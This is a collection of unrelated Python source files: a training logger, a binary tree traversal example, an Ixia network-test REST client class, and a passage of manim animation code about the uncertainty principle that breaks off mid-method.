if not self._should_log(step, log_frequency):
return
self.log_histogram(key + '_w', param.weight.data, step)
if hasattr(param.weight, 'grad') and param.weight.grad is not None:
self.log_histogram(key + '_w_g', param.weight.grad.data, step)
if hasattr(param, 'bias') and hasattr(param.bias, 'data'):
self.log_histogram(key + '_b', param.bias.data, step)
if hasattr(param.bias, 'grad') and param.bias.grad is not None:
self.log_histogram(key + '_b_g', param.bias.grad.data, step)
def log_image(self, key, image, step, log_frequency=None):
if not self._should_log(step, log_frequency):
return
assert key.startswith('train') or key.startswith('eval')
self._try_sw_log_image(key, image, step)
def log_video(self, key, frames, step, log_frequency=None):
if not self._should_log(step, log_frequency):
return
assert key.startswith('train') or key.startswith('eval')
self._try_sw_log_video(key, frames, step)
def log_histogram(self, key, histogram, step, log_frequency=None):
if not self._should_log(step, log_frequency):
return
assert key.startswith('train') or key.startswith('eval')
self._try_sw_log_histogram(key, histogram, step)
def dump(self, step, save=True, ty=None):
step = self._update_step(step)
if ty is None:
self._train_mg.dump(step, 'train', save)
self._eval_mg.dump(step, 'eval', save)
elif ty == 'eval':
self._eval_mg.dump(step, 'eval', save)
elif ty == 'train':
self._train_mg.dump(step, 'train', save)
else:
            raise ValueError(f'invalid log type: {ty}')
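
# Hedged usage sketch (illustrative; './example_logs' is an arbitrary path):
if __name__ == '__main__':
    os.makedirs('./example_logs', exist_ok=True)
    logger = Logger('./example_logs', save_tb=False, agent='drq')
    logger.log('train/episode_reward', 1.5, step=0)
    logger.dump(step=0, ty='train')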
|
'''
Level order binary tree traversal
'''
from collections import deque
class Node:
def __init__(self, value):
self.value = value
self.left = None
self.right = None
n1 = Node(1)
n2 = Node(2)
n3 = Node(3)
n4 = Node(None)
n5 = Node(2)
n6 = Node(None)
n7 = Node(3)
'''
        1
       / \
      2   2
     / \ / \
    3 None None 3
'''
# setup left tree
n1.left = n2
n2.left = n3
n2.right = n4
# setup right tree
n1.right = n5
n5.left = n6
n5.right = n7
nodes = deque([n1])
while nodes:
current_node = nodes.popleft()
    print(current_node.value)
if current_node.left:
nodes.append(current_node.left)
if current_node.right:
nodes.append(current_node.right)
|
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from uhd_restpy.base import Base
from uhd_restpy.files import Files
class Ports(Base):
"""
The Ports class encapsulates a list of ports resources that are managed by the system.
A list of resources can be retrieved from the server using the Ports.find() method.
"""
__slots__ = ()
_SDM_NAME = 'ports'
_SDM_ATT_MAP = {
'Description': 'description',
'IsAvailable': 'isAvailable',
'IsBusy': 'isBusy',
'IsLinkUp': 'isLinkUp',
'Location': 'location',
'Owner': 'owner',
'ResourceMode': 'resourceMode',
}
def __init__(self, parent):
super(Ports, self).__init__(parent)
@property
def Description(self):
"""
Returns
-------
- str:
"""
return self._get_attribute(self._SDM_ATT_MAP['Description'])
@property
def IsAvailable(self):
"""
Returns
-------
- bool:
"""
return self._get_attribute(self._SDM_ATT_MAP['IsAvailable'])
@property
def IsBusy(self):
"""
Returns
-------
- bool:
"""
return self._get_attribute(self._SDM_ATT_MAP['IsBusy'])
@property
def IsLinkUp(self):
"""
Returns
-------
- bool:
"""
return self._get_attribute(self._SDM_ATT_MAP['IsLinkUp'])
@property
def Location(self):
"""
Returns
-------
- str:
"""
return self._get_attribute(self._SDM_ATT_MAP['Location'])
@property
def Owner(self):
"""
Returns
-------
- str:
"""
return self._get_attribute(self._SDM_ATT_MAP['Owner'])
@property
def ResourceMode(self):
"""
Returns
-------
- str(normal | tenGig | fortyGig | singleMode | dualMode | hundredGigNonFanOut | fortyGigFanOut | threeByTenGigFanOut | eightByTenGigFanOut | fourByTwentyFiveGigNonFanOut | twoByTwentyFiveGigNonFanOut | oneByFiftyGigNonFanOut | fortyGigNonFanOut | oneByTenGigFanOut | fourByTenGigFanOut | incompatibleMode | hundredGigCapturePlayback | fortyGigCapturePlayback | novusHundredGigNonFanOut | novusFourByTwentyFiveGigNonFanOut | novusTwoByFiftyGigNonFanOut | novusOneByFortyGigNonFanOut | novusFourByTenGigNonFanOut | krakenOneByFourHundredGigNonFanOut | krakenOneByTwoHundredGigNonFanOut | krakenTwoByOneHundredGigFanOut | krakenFourByFiftyGigFanOut | aresOneOneByFourHundredGigNonFanOut | aresOneTwoByTwoHundredGigFanOut | aresOneFourByOneHundredGigFanOut | aresOneFourByOneHundredGigMacSecFanOut | aresOneEightByFiftyGigFanOut | uhdOneHundredEightByHundredGigNonFanOut | uhdOneHundredEightByFortyGigNonFanOut | uhdOneHundredSixteenByFiftyGigFanOut | uhdOneHundredThirtyTwoByTwentyFiveGigFanOut | uhdOneHundredThirtyTwoByTenGigFanOut | notApplicable):
"""
return self._get_attribute(self._SDM_ATT_MAP['ResourceMode'])
def find(self, Description=None, IsAvailable=None, IsBusy=None, IsLinkUp=None, Location=None, Owner=None, ResourceMode=None):
"""Finds and retrieves ports resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve ports resources from the server.
To retrieve an exact match, ensure the parameter value starts with ^ and ends with $.
By default, the find method takes no parameters and will retrieve all ports resources from the server.
Args
----
- Description (str):
- IsAvailable (bool):
- IsBusy (bool):
- IsLinkUp (bool):
- Location (str):
- Owner (str):
- ResourceMode (str(normal | tenGig | fortyGig | singleMode | dualMode | hundredGigNonFanOut | fortyGigFanOut | threeByTenGigFanOut | eightByTenGigFanOut | fourByTwentyFiveGigNonFanOut | twoByTwentyFiveGigNonFanOut | oneByFiftyGigNonFanOut | fortyGigNonFanOut | oneByTenGigFanOut | fourByTenGigFanOut | incompatibleMode | hundredGigCapturePlayback | fortyGigCapturePlayback | novusHundredGigNonFanOut | novusFourByTwentyFiveGigNonFanOut | novusTwoByFiftyGigNonFanOut | novusOneByFortyGigNonFanOut | novusFourByTenGigNonFanOut | krakenOneByFourHundredGigNonFanOut | krakenOneByTwoHundredGigNonFanOut | krakenTwoByOneHundredGigFanOut | krakenFourByFiftyGigFanOut | aresOneOneByFourHundredGigNonFanOut | aresOneTwoByTwoHundredGigFanOut | aresOneFourByOneHundredGigFanOut | aresOneFourByOneHundredGigMacSecFanOut | aresOneEightByFiftyGigFanOut | uhdOneHundredEightByHundredGigNonFanOut | uhdOneHundredEightByFortyGigNonFanOut | uhdOneHundredSixteenByFiftyGigFanOut | uhdOneHundredThirtyTwoByTwentyFiveGigFanOut | uhdOneHundredThirtyTwoByTenGigFanOut | notApplicable)):
Returns
-------
- self: This instance with matching ports resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of ports data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the ports resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
def ClearOwnership(self):
"""Executes the clearOwnership operation on the server.
Clears ownership on a list of location ports.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
return self._execute('clearOwnership', payload=payload, response_object=None)
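# --- Usage sketch (illustrative only) ---
# `chassis` below is a stand-in for whatever parent node exposes this Ports
# class in a live session; it is an assumption for the example, not part of
# this module. find() filters are evaluated server-side as regexes, so anchor
# values with ^ and $ for exact matches:
#
#   free_ports = Ports(chassis).find(IsAvailable=True, Location='^1/1$')
#   for port in free_ports:
#       print(port.Location, port.Owner, port.ResourceMode)
#   free_ports.ClearOwnership()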
|
# -*- coding: utf-8 -*-
import scipy
from manimlib.imports import *
from from_3b1b.old.fourier import *
import warnings
warnings.warn("""
Warning: This file makes use of
ContinualAnimation, which has since
been deprecated
""")
FREQUENCY_COLOR = RED
USE_ALMOST_FOURIER_BY_DEFAULT = False
class GaussianDistributionWrapper(Line):
"""
This is meant to encode a 2d normal distribution as
a mobject (so as to be able to have it be interpolated
during animations). It is a line whose center is the mean
mu of a distribution, and whose radial vector (center to end)
is the distribution's standard deviation
"""
CONFIG = {
"stroke_width" : 0,
"mu" : ORIGIN,
"sigma" : RIGHT,
}
def __init__(self, **kwargs):
Line.__init__(self, ORIGIN, RIGHT, **kwargs)
self.change_parameters(self.mu, self.sigma)
def change_parameters(self, mu = None, sigma = None):
curr_mu, curr_sigma = self.get_parameters()
mu = mu if mu is not None else curr_mu
sigma = sigma if sigma is not None else curr_sigma
self.put_start_and_end_on(mu - sigma, mu + sigma)
return self
def get_parameters(self):
""" Return mu_x, mu_y, sigma_x, sigma_y"""
center, end = self.get_center(), self.get_end()
return center, end-center
def get_random_points(self, size = 1):
mu, sigma = self.get_parameters()
return np.array([
np.array([
np.random.normal(mu_coord, sigma_coord)
for mu_coord, sigma_coord in zip(mu, sigma)
])
for x in range(size)
])
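# Usage sketch (illustrative; assumes the usual manim constants like RIGHT/UP,
# which are in scope here via manimlib.imports):
#
#   gdw = GaussianDistributionWrapper(mu=2*RIGHT + UP, sigma=0.5*RIGHT)
#   mu, sigma = gdw.get_parameters()          # center point, radial vector
#   samples = gdw.get_random_points(size=5)   # 5 independent draws
#   gdw.change_parameters(sigma=0.1*RIGHT)    # tighten the distribution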
class ProbabalisticMobjectCloud(ContinualAnimation):
CONFIG = {
"fill_opacity" : 0.25,
"n_copies" : 100,
"gaussian_distribution_wrapper_config" : {},
"time_per_change" : 1./60,
"start_up_time" : 0,
}
def __init__(self, prototype, **kwargs):
digest_config(self, kwargs)
fill_opacity = self.fill_opacity or prototype.get_fill_opacity()
if "mu" not in self.gaussian_distribution_wrapper_config:
self.gaussian_distribution_wrapper_config["mu"] = prototype.get_center()
self.gaussian_distribution_wrapper = GaussianDistributionWrapper(
**self.gaussian_distribution_wrapper_config
)
self.time_since_last_change = np.inf
group = VGroup(*[
prototype.copy().set_fill(opacity = fill_opacity)
for x in range(self.n_copies)
])
ContinualAnimation.__init__(self, group, **kwargs)
self.update_mobject(0)
def update_mobject(self, dt):
self.time_since_last_change += dt
if self.time_since_last_change < self.time_per_change:
return
self.time_since_last_change = 0
group = self.mobject
points = self.gaussian_distribution_wrapper.get_random_points(len(group))
for mob, point in zip(group, points):
self.update_mobject_by_point(mob, point)
return self
def update_mobject_by_point(self, mobject, point):
mobject.move_to(point)
return self
class ProbabalisticDotCloud(ProbabalisticMobjectCloud):
CONFIG = {
"color" : BLUE,
}
def __init__(self, **kwargs):
digest_config(self, kwargs)
dot = Dot(color = self.color)
ProbabalisticMobjectCloud.__init__(self, dot)
class ProbabalisticVectorCloud(ProbabalisticMobjectCloud):
CONFIG = {
"color" : RED,
"n_copies" : 20,
"fill_opacity" : 0.5,
"center_func" : lambda : ORIGIN,
}
def __init__(self, **kwargs):
digest_config(self, kwargs)
vector = Vector(
RIGHT, color = self.color,
max_tip_length_to_length_ratio = 1,
)
ProbabalisticMobjectCloud.__init__(self, vector)
def update_mobject_by_point(self, vector, point):
vector.put_start_and_end_on(
self.center_func(),
point
)
class RadarDish(SVGMobject):
CONFIG = {
"file_name" : "radar_dish",
"fill_color" : LIGHT_GREY,
"stroke_color" : WHITE,
"stroke_width" : 1,
"height" : 1,
}
class Plane(SVGMobject):
CONFIG = {
"file_name" : "plane",
"color" : LIGHT_GREY,
"height" : 1,
}
def __init__(self, **kwargs):
SVGMobject.__init__(self, **kwargs)
self.rotate(-TAU/4)
class FalconHeavy(SVGMobject):
CONFIG = {
"file_name" : "falcon_heavy",
"color" : WHITE,
"logo_color" : BLUE_E,
"height" : 1.5,
}
def __init__(self, **kwargs):
SVGMobject.__init__(self, **kwargs)
self.logo = self[-9:]
self.logo.set_color(self.logo_color)
class RadarPulseSingleton(ContinualAnimation):
CONFIG = {
"speed" : 3.0,
"direction" : RIGHT,
"start_up_time" : 0,
"fade_in_time" : 0.5,
"color" : WHITE,
"stroke_width" : 3,
}
def __init__(self, radar_dish, target, **kwargs):
digest_config(self, kwargs)
self.direction = self.direction/get_norm(self.direction)
self.radar_dish = radar_dish
self.target = target
self.reflection_distance = None
self.arc = Arc(
start_angle = -30*DEGREES,
angle = 60*DEGREES,
)
self.arc.set_height(0.75*radar_dish.get_height())
self.arc.move_to(radar_dish, UP+RIGHT)
self.start_points = np.array(self.arc.points)
self.start_center = self.arc.get_center()
self.finished = False
ContinualAnimation.__init__(self, self.arc, **kwargs)
def update_mobject(self, dt):
arc = self.arc
total_distance = self.speed*self.internal_time
arc.points = np.array(self.start_points)
arc.shift(total_distance*self.direction)
if self.internal_time < self.fade_in_time:
alpha = np.clip(self.internal_time/self.fade_in_time, 0, 1)
arc.set_stroke(self.color, alpha*self.stroke_width)
if self.reflection_distance is None:
#Check if reflection is happening
arc_point = arc.get_edge_center(self.direction)
target_point = self.target.get_edge_center(-self.direction)
arc_distance = np.dot(arc_point, self.direction)
target_distance = np.dot(target_point, self.direction)
if arc_distance > target_distance:
self.reflection_distance = target_distance
#Don't use elif in case the above code creates reflection_distance
if self.reflection_distance is not None:
delta_distance = total_distance - self.reflection_distance
point_distances = np.dot(self.direction, arc.points.T)
diffs = point_distances - self.reflection_distance
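#Mirror any points that have passed the target plane back across it,
#so the pulse appears to bounce off the target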
shift_vals = np.outer(-2*np.maximum(diffs, 0), self.direction)
arc.points += shift_vals
#Check if done
arc_point = arc.get_edge_center(-self.direction)
if np.dot(arc_point, self.direction) < np.dot(self.start_center, self.direction):
self.finished = True
self.arc.fade(1)
def is_finished(self):
return self.finished
class RadarPulse(ContinualAnimation):
CONFIG = {
"n_pulse_singletons" : 8,
"frequency" : 0.05,
"colors" : [BLUE, YELLOW]
}
def __init__(self, *args, **kwargs):
digest_config(self, kwargs)
colors = color_gradient(self.colors, self.n_pulse_singletons)
self.pulse_singletons = [
RadarPulseSingleton(*args, color = color, **kwargs)
for color in colors
]
pulse_mobjects = VGroup(*[ps.mobject for ps in self.pulse_singletons])
ContinualAnimation.__init__(self, pulse_mobjects, **kwargs)
def update_mobject(self, dt):
for i, ps in enumerate(self.pulse_singletons):
ps.internal_time = self.internal_time - i*self.frequency
ps.update_mobject(dt)
def is_finished(self):
return all([ps.is_finished() for ps in self.pulse_singletons])
class MultipleFlashes(Succession):
CONFIG = {
"run_time_per_flash" : 1.0,
"num_flashes" : 3,
}
def __init__(self, *args, **kwargs):
digest_config(self, kwargs)
kwargs["run_time"] = self.run_time_per_flash
Succession.__init__(self, *[
Flash(*args, **kwargs)
for x in range(self.num_flashes)
])
class TrafficLight(SVGMobject):
CONFIG = {
"file_name" : "traffic_light",
"height" : 0.7,
"post_height" : 2,
"post_width" : 0.05,
}
def __init__(self, **kwargs):
SVGMobject.__init__(self, **kwargs)
post = Rectangle(
height = self.post_height,
width = self.post_width,
stroke_width = 0,
fill_color = WHITE,
fill_opacity = 1,
)
self.move_to(post.get_top(), DOWN)
self.add_to_back(post)
###################
class MentionUncertaintyPrinciple(TeacherStudentsScene):
def construct(self):
title = TextMobject("Heisenberg Uncertainty Principle")
title.to_edge(UP)
dot_cloud = ProbabalisticDotCloud()
vector_cloud = ProbabalisticVectorCloud(
gaussian_distribution_wrapper_config = {"sigma_x" : 0.2},
center_func = lambda : dot_cloud.gaussian_distribution_wrapper.get_parameters()[0],
)
for cloud in dot_cloud, vector_cloud:
cloud.gaussian_distribution_wrapper.next_to(
title, DOWN, 2*LARGE_BUFF
)
vector_cloud.gaussian_distribution_wrapper.shift(3*RIGHT)
def get_brace_text_group_update(gdw, vect, text, color):
brace = Brace(gdw, vect)
text = brace.get_tex("2\\sigma_{\\text{%s}}"%text, buff = SMALL_BUFF)
group = VGroup(brace, text)
def update_group(group):
brace, text = group
brace.match_width(gdw, stretch = True)
brace.next_to(gdw, vect)
text.next_to(brace, vect, buff = SMALL_BUFF)
group.set_color(color)
return Mobject.add_updater(group, update_group)
dot_brace_anim = get_brace_text_group_update(
dot_cloud.gaussian_distribution_wrapper,
DOWN, "position", dot_cloud.color
)
vector_brace_anim = get_brace_text_group_update(
vector_cloud.gaussian_distribution_wrapper,
UP, "momentum", vector_cloud.color
)
self.add(title)
self.add(dot_cloud)
self.play(
Write(title),
self.teacher.change, "raise_right_hand",
self.get_student_changes(*["pondering"]*3)
)
self.play(
Write(dot_brace_anim.mobject, run_time = 1)
)
self.add(dot_brace_anim)
self.wait()
# self.wait(2)
self.play(
dot_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 0.1*RIGHT},
run_time = 2,
)
self.wait()
self.add(vector_cloud)
self.play(
FadeIn(vector_brace_anim.mobject)
)
self.add(vector_brace_anim)
self.play(
vector_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : RIGHT},
self.get_student_changes(*3*["confused"]),
run_time = 3,
)
#Back and forth
for x in range(2):
self.play(
dot_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 2*RIGHT},
vector_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 0.1*RIGHT},
run_time = 3,
)
self.change_student_modes("thinking", "erm", "sassy")
self.play(
dot_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 0.1*RIGHT},
vector_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 1*RIGHT},
run_time = 3,
)
self.wait()
class FourierTradeoff(Scene):
CONFIG = {
"show_text" : True,
"complex_to_real_func" : lambda z : z.real,
"widths" : [6, 0.02, 1],
}
def construct(self):
#Setup axes
time_mean = 4
time_axes = Axes(
x_min = 0,
x_max = 2*time_mean,
x_axis_config = {"unit_size" : 1.5},
y_min = -2,
y_max = 2,
y_axis_config = {"unit_size" : 0.5}
)
time_label = TextMobject("Time")
time_label.scale(1.5)
time_label.next_to(
time_axes.x_axis.get_right(), UP+LEFT,
buff = MED_SMALL_BUFF,
)
time_axes.add(time_label)
time_axes.center().to_edge(UP)
time_axes.x_axis.add_numbers(*list(range(1, 2*time_mean)))
frequency_axes = Axes(
x_min = 0,
x_max = 8,
x_axis_config = {"unit_size" : 1.5},
y_min = -0.025,
y_max = 0.075,
y_axis_config = {
"unit_size" : 30,
"tick_frequency" : 0.025,
},
color = TEAL,
)
frequency_label = TextMobject("Frequency")
frequency_label.scale(1.5)
frequency_label.next_to(
frequency_axes.x_axis.get_right(), UP+LEFT,
buff = MED_SMALL_BUFF,
)
frequency_label.set_color(FREQUENCY_COLOR)
frequency_axes.add(frequency_label)
frequency_axes.move_to(time_axes, LEFT)
frequency_axes.to_edge(DOWN, buff = LARGE_BUFF)
frequency_axes.x_axis.add_numbers()
# Graph information
#x-coordinate of this point determines width of wave_packet graph
width_tracker = ExponentialValueTracker(0.5)
get_width = width_tracker.get_value
def get_wave_packet_function():
factor = 1./get_width()
return lambda t : (factor**0.25)*np.cos(4*TAU*t)*np.exp(-factor*(t-time_mean)**2)
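#The factor**0.25 prefactor keeps the packet's total energy roughly constant
#as its width changes: the integral of the squared envelope scales like
#factor**(-1/2), so the amplitude must scale like factor**(1/4)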
def get_wave_packet():
graph = time_axes.get_graph(
get_wave_packet_function(),
num_graph_points = 200,
)
graph.set_color(YELLOW)
return graph
time_radius = 10
def get_wave_packet_fourier_transform():
return get_fourier_graph(
frequency_axes,
get_wave_packet_function(),
t_min = time_mean - time_radius,
t_max = time_mean + time_radius,
n_samples = 2*time_radius*17,
complex_to_real_func = self.complex_to_real_func,
color = FREQUENCY_COLOR,
)
wave_packet = get_wave_packet()
wave_packet_update = UpdateFromFunc(
wave_packet,
lambda g : Transform(g, get_wave_packet()).update(1)
)
fourier_graph = get_wave_packet_fourier_transform()
fourier_graph_update = UpdateFromFunc(
fourier_graph,
lambda g : Transform(g, get_wave_packet_fourier_transform()).update(1)
)
arrow = Arrow(
wave_packet, frequency_axes.coords_to_point(
4, frequency_axes.y_max/2,
),
color = FREQUENCY_COLOR,
)
fourier_words = TextMobject("Fourier Transform")
fourier_words.next_to(arrow, LEFT, buff = MED_LARGE_BUFF)
sub_words = TextMobject("(To be explained shortly)")
sub_words.set_color(BLUE)
sub_words.scale(0.75)
sub_words.next_to(fourier_words, DOWN)
#Draw items
self.add(time_axes, frequency_axes)
self.play(ShowCreation(wave_packet, rate_func = double_smooth))
anims = [ReplacementTransform(
wave_packet.copy(), fourier_graph
)]
if self.show_text:
anims += [
GrowArrow(arrow),
Write(fourier_words, run_time = 1)
]
self.play(*anims)
# self.play(FadeOut(arrow))
self.wait()
for width in self.widths:
self.play(
width_tracker.set_value, width,
wave_packet_update,
fourier_graph_update,
run_time = 3
)
if sub_words not in self.mobjects and self.show_text:
self.play(FadeIn(sub_words))
else:
self.wait()
self.wait()
class ShowPlan(PiCreatureScene):
def construct(self):
self.add_title()
words = self.get_words()
self.play_sound_anims(words[0])
self.play_doppler_anims(words[1])
self.play_quantum_anims(words[2])
def add_title(self):
title = TextMobject("The plan")
title.scale(1.5)
title.to_edge(UP)
h_line = Line(LEFT, RIGHT).scale(FRAME_X_RADIUS)
h_line.next_to(title, DOWN)
self.add(title, h_line)
def get_words(self):
trips = [
("sound waves", "(time vs. frequency)", YELLOW),
("Doppler radar", "(distance vs. velocity)", GREEN),
("quantum particles", "(position vs. momentum)", BLUE),
]
words = VGroup()
for topic, tradeoff, color in trips:
word = TextMobject("Uncertainty for", topic, tradeoff)
word[1:].set_color(color)
word[2].scale(0.75)
word[2].next_to(word[1], DOWN, buff = 1.5*SMALL_BUFF)
words.add(word)
words.arrange(DOWN, aligned_edge = LEFT, buff = MED_LARGE_BUFF)
words.to_edge(LEFT)
return words
def play_sound_anims(self, word):
morty = self.pi_creature
wave = FunctionGraph(
lambda x : 0.3*np.sin(15*x)*np.sin(0.5*x),
x_min = 0, x_max = 30,
step_size = 0.001,
)
wave.next_to(word, RIGHT)
rect = BackgroundRectangle(wave, fill_opacity = 1)
rect.stretch(2, 1)
rect.next_to(wave, LEFT, buff = 0)
always_shift(wave, direction=LEFT, rate=5)
wave_fader = UpdateFromAlphaFunc(
wave,
lambda w, a : w.set_stroke(width = 3*a)
)
checkmark = self.get_checkmark(word)
self.add(wave)
self.add_foreground_mobjects(rect, word)
self.play(
Animation(word),
wave_fader,
morty.change, "raise_right_hand", word
)
self.wait(2)
wave_fader.rate_func = lambda a : 1-smooth(a)
self.add_foreground_mobjects(checkmark)
self.play(
Write(checkmark),
morty.change, "happy",
wave_fader,
)
self.remove_foreground_mobjects(rect, word)
self.add(word)
self.wait()
def play_doppler_anims(self, word):
morty = self.pi_creature
radar_dish = RadarDish()
radar_dish.next_to(word, DOWN, aligned_edge = LEFT)
target = Plane()
# target.match_height(radar_dish)
target.next_to(radar_dish, RIGHT, buff = LARGE_BUFF)
always_shift(target, direction = RIGHT, rate = 1.25)
pulse = RadarPulse(radar_dish, target)
checkmark = self.get_checkmark(word)
self.add(target)
self.play(
Write(word),
DrawBorderThenFill(radar_dish),
UpdateFromAlphaFunc(
target, lambda m, a : m.set_fill(opacity = a)
),
morty.change, "pondering",
run_time = 1
)
self.add(pulse)
count = it.count() #TODO, this is not a great hack...
while not pulse.is_finished() and next(count) < 15:
self.play(
morty.look_at, pulse.mobject,
run_time = 0.5
)
self.play(
Write(checkmark),
UpdateFromAlphaFunc(
target, lambda m, a : m.set_fill(opacity = 1-a)
),
FadeOut(radar_dish),
morty.change, "happy"
)
self.wait()
def play_quantum_anims(self, word):
morty = self.pi_creature
dot_cloud = ProbabalisticDotCloud()
gdw = dot_cloud.gaussian_distribution_wrapper
gdw.next_to(word, DOWN, MED_LARGE_BUFF)
gdw.rotate(5*DEGREES)
gdw.save_state()
gdw.scale(0)
checkmark = self.get_checkmark(word)
ish = TextMobject("$\\dots$ish")
ish.next_to(checkmark, RIGHT, -SMALL_BUFF, DOWN)
self.add(dot_cloud)
self.play(
Write(word),
FadeIn(dot_cloud.mobject),
morty.change, "confused",
)
self.play(gdw.restore, run_time = 2)
self.play(Write(checkmark))
self.wait()
self.play(
Write(ish),
morty.change, 'maybe'
)
self.wait(6)
##
def get_checkmark(self, word):
checkmark = TexMobject("\\checkmark")
checkmark.set_color(GREEN)
checkmark.scale(1.25)
checkmark.next_to(word[1], UP+RIGHT, buff = 0)
return checkmark
class StartWithIntuition(TeacherStudentsScene):
def construct(self):
self.teacher_says(
"You already \\\\ have this \\\\ intuition",
bubble_kwargs = {
"height" : 3.5,
"width" : 3,
},
)
self.change_student_modes("pondering", "erm", "maybe")
self.look_at(VectorizedPoint(4*LEFT + 2*UP))
self.wait(5)
class TwoCarsAtRedLight(Scene):
CONFIG = {
"text_scale_val" : 0.75,
}
def construct(self):
self.pull_up_behind()
self.flash_in_sync_short_time()
self.show_low_confidence()
self.flash_in_sync_long_time()
self.show_high_confidence()
def pull_up_behind(self):
#Setup Traffic light
traffic_light = TrafficLight()
traffic_light.move_to(6*RIGHT + 2.5*DOWN, DOWN)
source_point = VectorizedPoint(
traffic_light[2].get_right()
)
screen = Line(ORIGIN, UP)
screen.next_to(source_point, RIGHT, LARGE_BUFF)
red_light = Spotlight(
color = RED,
source_point = source_point,
radius = 0.5,
screen = screen,
num_levels = 20,
opacity_function = lambda r : 1/(10*r**2+1)
)
red_light.fade(0.5)
red_light.rotate(TAU/2, about_edge = LEFT)
self.add(red_light, traffic_light)
#Setup cars
car1, car2 = cars = self.cars = VGroup(*[
Car() for x in range(2)
])
cars.arrange(RIGHT, buff = LARGE_BUFF)
cars.next_to(
traffic_light, LEFT,
buff = LARGE_BUFF, aligned_edge = DOWN
)
car2.pi_creature.set_color(GREY_BROWN)
car1.start_point = car1.get_corner(DOWN+RIGHT)
car1.shift(FRAME_X_RADIUS*LEFT)
#Pull up car
self.add(cars)
self.play(
SwitchOn(
red_light,
rate_func = squish_rate_func(smooth, 0, 0.3),
),
Animation(traffic_light),
self.get_flashes(car2, num_flashes = 3),
MoveCar(
car1, car1.start_point,
run_time = 3,
rate_func = rush_from,
)
)
def flash_in_sync_short_time(self):
car1, car2 = cars = self.cars
#Setup axes
axes = Axes(
x_min = 0,
x_max = 5,
y_min = 0,
y_max = 2,
y_axis_config = {
"tick_frequency" : 0.5,
},
)
axes.x_axis.add_numbers(1, 2, 3)
time_label = TextMobject("Time")
time_label.scale(self.text_scale_val)
time_label.next_to(axes.x_axis.get_right(), DOWN)
y_title = TextMobject("Signal")
y_title.scale(self.text_scale_val)
y_title.next_to(axes.y_axis, UP, SMALL_BUFF)
axes.add(time_label, y_title)
axes.to_corner(UP+LEFT, buff = MED_SMALL_BUFF)
graph = axes.get_graph(
self.get_multispike_function(list(range(1, 4))),
x_min = 0.8,
x_max = 3.8,
)
graph.set_color(YELLOW)
#Label short duration
brace = Brace(Line(
axes.input_to_graph_point(1, graph),
axes.input_to_graph_point(3, graph),
), UP)
text = TextMobject("Short duration observation")
text.scale(self.text_scale_val)
text.next_to(brace, UP, SMALL_BUFF)
text.align_to(
axes.coords_to_point(0.25, 0), LEFT
)
self.play(
self.get_flashes(car1, num_flashes = 2),
self.get_flashes(car2, num_flashes = 2),
LaggedStartMap(FadeIn, VGroup(
axes, time_label, y_title,
))
)
self.play(
self.get_flashes(car1, num_flashes = 3),
self.get_flashes(car2, num_flashes = 3),
ShowCreation(graph, rate_func=linear, run_time = 3)
)
self.play(
self.get_flashes(car1, num_flashes = 10),
self.get_flashes(car2, num_flashes = 10, run_time_per_flash = 0.98),
GrowFromCenter(brace),
Write(text),
)
self.time_axes = axes
self.time_graph = graph
self.time_graph_label = VGroup(
brace, text
)
def show_low_confidence(self):
car1, car2 = cars = self.cars
time_axes = self.time_axes
#Setup axes
frequency_axes = Axes(
x_min = 0,
x_max = 3,
y_min = 0,
y_max = 1.5,
y_axis_config = {
"tick_frequency" : 0.5,
}
)
frequency_axes.next_to(time_axes, DOWN, LARGE_BUFF)
frequency_axes.set_color(LIGHT_GREY)
frequency_label = TextMobject("Frequency")
frequency_label.scale(self.text_scale_val)
frequency_label.next_to(frequency_axes.x_axis.get_right(), DOWN)
frequency_axes.add(
frequency_label,
VectorizedPoint(frequency_axes.y_axis.get_top())
)
frequency_axes.x_axis.add_numbers(1, 2)
frequency_graph = frequency_axes.get_graph(
lambda x : np.exp(-4*(x-1)**2),
x_min = 0,
x_max = 2,
)
frequency_graph.set_color(RED)
peak_point = frequency_axes.input_to_graph_point(
1, frequency_graph
)
#Setup label
label = TextMobject("Low confidence")
label.scale(self.text_scale_val)
label.move_to(peak_point + UP+RIGHT, DOWN)
label.match_color(frequency_graph)
arrow = Arrow(label.get_bottom(), peak_point, buff = 2*SMALL_BUFF)
arrow.match_color(frequency_graph)
self.play(
ReplacementTransform(
self.time_axes.copy(), frequency_axes
),
ReplacementTransform(
self.time_graph.copy(), frequency_graph
),
)
self.play(
Write(label),
GrowArrow(arrow)
)
self.wait()
self.frequency_axes = frequency_axes
self.frequency_graph = frequency_graph
self.frequency_graph_label = VGroup(
label, arrow
)
def flash_in_sync_long_time(self):
